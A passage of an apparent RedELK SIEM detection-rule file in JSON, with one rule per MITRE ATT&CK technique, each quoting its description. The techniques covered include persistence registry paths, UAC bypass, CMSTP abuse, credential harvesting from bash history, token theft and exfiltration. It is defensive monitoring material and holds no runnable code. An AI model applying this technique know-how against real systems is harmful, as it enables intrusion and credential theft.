3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1103] AppInit DLLs","query":"threat.technique.id: T1103","references":["https://attack.mitre.org/techniques/T1103","https://attack.mitre.org/techniques/T1546/010"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1103","name":"AppInit DLLs","id":"T1103"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1103","name":"AppInit DLLs","id":"T1103"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents. [1] These AppleEvent messages can be easily scripted with AppleScript for local or remote execution.\nosascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the osalang program. AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.\nAdversaries can use this to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via Python[2]. Scripts can be run from the command-line via osascript /path/to/script or osascript -e \"script here\".","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1155","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1155] AppleScript","query":"threat.technique.id: T1155","references":["https://attack.mitre.org/techniques/T1155","https://attack.mitre.org/techniques/T1059/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1155","name":"AppleScript","id":"T1155"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1155","name":"AppleScript","id":"T1155"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.\nApplication access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).[1] OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.[2]\nFor example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a \"refresh\" token enabling background access is awarded.[3] With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.[4]\nCompromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1527","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1527] Application Access Token","query":"threat.technique.id: T1527","references":["https://attack.mitre.org/techniques/T1527","https://attack.mitre.org/techniques/T1550/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1527","name":"Application Access Token","id":"T1527"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1527","name":"Application Access Token","id":"T1527"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.).\nAccess to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.\nThe permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1017","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1017] Application Deployment Software","query":"threat.technique.id: T1017","references":["https://attack.mitre.org/techniques/T1017","https://attack.mitre.org/techniques/T1072"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1017","name":"Application Deployment Software","id":"T1017"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1010","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1010] Application Window Discovery","query":"threat.technique.id: T1010","references":["https://attack.mitre.org/techniques/T1010"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1010","name":"Application Window Discovery","id":"T1010"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. [1]\nWithin the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS.\nA list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n%WINDIR%\\AppPatch\\sysmain.sdb and\nhklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\nCustom databases are stored in:\n%WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom and\nhklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to Bypass User Access Control (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).\nUtilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. [2] Shims can also be abused to establish persistence by continuously being invoked by affected programs.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1138","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1138] Application Shimming","query":"threat.technique.id: T1138","references":["https://attack.mitre.org/techniques/T1138","https://attack.mitre.org/techniques/T1546/011"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1138","name":"Application Shimming","id":"T1138"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1138","name":"Application Shimming","id":"T1138"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1123","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1123] Audio Capture","query":"threat.technique.id: T1123","references":["https://attack.mitre.org/techniques/T1123"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1123","name":"Audio Capture","id":"T1123"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a Command and Scripting Interpreter to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools.\nThis technique may incorporate use of other techniques such as File and Directory Discovery and Lateral Tool Transfer to identify and move files.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1119","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1119] Automated Collection","query":"threat.technique.id: T1119","references":["https://attack.mitre.org/techniques/T1119"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1119","name":"Automated Collection","id":"T1119"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. [1]\nAdversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ with the key value of \"Authentication Packages\"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1131","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1131] Authentication Package","query":"threat.technique.id: T1131","references":["https://attack.mitre.org/techniques/T1131","https://attack.mitre.org/techniques/T1547/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1131","name":"Authentication Package","id":"T1131"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.\nWhen automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over C2 Channel and Exfiltration Over Alternative Protocol.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1020","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1020] Automated Exfiltration","query":"threat.technique.id: T1020","references":["https://attack.mitre.org/techniques/T1020"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1020","name":"Automated Exfiltration","id":"T1020"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0010","name":"Exfiltration","id":"TA0010"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM). [1] [2] BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.\nThe interface to create and manage BITS jobs is accessible through PowerShell [2] and the BITSAdmin tool. [3]\nAdversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls. [4] [5] [6] BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots). [7] [4]\nBITS upload functionalities can also be used to perform Exfiltration Over Alternative Protocol. [4]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1197","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1197] BITS Jobs","query":"threat.technique.id: T1197","references":["https://attack.mitre.org/techniques/T1197"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1197","name":"BITS Jobs","id":"T1197"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1197","name":"BITS Jobs","id":"T1197"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the \"history\" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. [1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1139","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1139] Bash History","query":"threat.technique.id: T1139","references":["https://attack.mitre.org/techniques/T1139","https://attack.mitre.org/techniques/T1552/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1139","name":"Bash History","id":"T1139"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.\nBinary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.[1] The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.[2] Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.[3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1009","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1009] Binary Padding","query":"threat.technique.id: T1009","references":["https://attack.mitre.org/techniques/T1009","https://attack.mitre.org/techniques/T1027/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1009","name":"Binary Padding","id":"T1009"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.\nBrowser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially Credentials In Files associated with logins cached by a browser.\nSpecific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1217","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1217] Browser Bookmark Discovery","query":"threat.technique.id: T1217","references":["https://attack.mitre.org/techniques/T1217"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1217","name":"Browser Bookmark Discovery","id":"T1217"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\nA bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). [1] The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. [2]\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1067","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1067] Bootkit","query":"threat.technique.id: T1067","references":["https://attack.mitre.org/techniques/T1067","https://attack.mitre.org/techniques/T1542/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1067","name":"Bootkit","id":"T1067"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse Internet browser extensions to establish persistence access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access. [1] [2]\nMalicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners. [3] Once the extension is installed, it can browse to websites in the background, [4] [5] steal all information that a user enters into a browser (including credentials) [6] [7] and be used as an installer for a RAT for persistence.\nThere have also been instances of botnets using a persistent backdoor through malicious Chrome extensions. [8] There have also been similar examples of extensions being used for command & control [9].","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1176","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1176] Browser Extensions","query":"threat.technique.id: T1176","references":["https://attack.mitre.org/techniques/T1176"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1176","name":"Browser Extensions","id":"T1176"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1110","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1110] Brute Force","query":"threat.technique.id: T1110","references":["https://attack.mitre.org/techniques/T1110"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1110","name":"Brute Force","id":"T1110"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. [1]\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated Component Object Model objects without prompting the user through the UAC notification box. [2] [3] An example of this is use of Rundll32 to load a specifically crafted DLL which loads an auto-elevated Component Object Model object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.[4]\nMany methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods[5] that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\neventvwr.exe can auto-elevate and execute a specified binary or script.[6][7]\nAnother bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.[8]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1088","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1088] Bypass User Account Control","query":"threat.technique.id: T1088","references":["https://attack.mitre.org/techniques/T1088","https://attack.mitre.org/techniques/T1548/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1088","name":"Bypass User Account Control","id":"T1088"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1088","name":"Bypass User Account Control","id":"T1088"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. [1] CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. [2] Similar to Regsvr32 / \"Squiblydoo\", CMSTP.exe may be abused to load and execute DLLs [3] and/or COM scriptlets (SCT) from remote servers. [4] [5] [6] This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.\nCMSTP.exe can also be abused to Bypass User Access Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. [3] [5] [6]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1191","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1191] CMSTP","query":"threat.technique.id: T1191","references":["https://attack.mitre.org/techniques/T1191","https://attack.mitre.org/techniques/T1218/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1191","name":"CMSTP","id":"T1191"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1191","name":"CMSTP","id":"T1191"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access [1] [2] or by administrators using the built-in assoc utility. [3] Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\nSystem file associations are listed under HKEY_CLASSES_ROOT.[extension], for example HKEY_CLASSES_ROOT.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT[handler]\\shell[action]\\command. For example: HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\nThe values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. [4]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1042","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1042] Change Default File Association","query":"threat.technique.id: T1042","references":["https://attack.mitre.org/techniques/T1042","https://attack.mitre.org/techniques/T1546/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1042","name":"Change Default File Association","id":"T1042"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may collect data stored in the clipboard from users copying information within or between applications.\nIn Windows, Applications can access clipboard data by using the Windows API.[1] OSX provides a native command, pbpaste, to grab clipboard contents.[2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1115","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1115] Clipboard Data","query":"threat.technique.id: 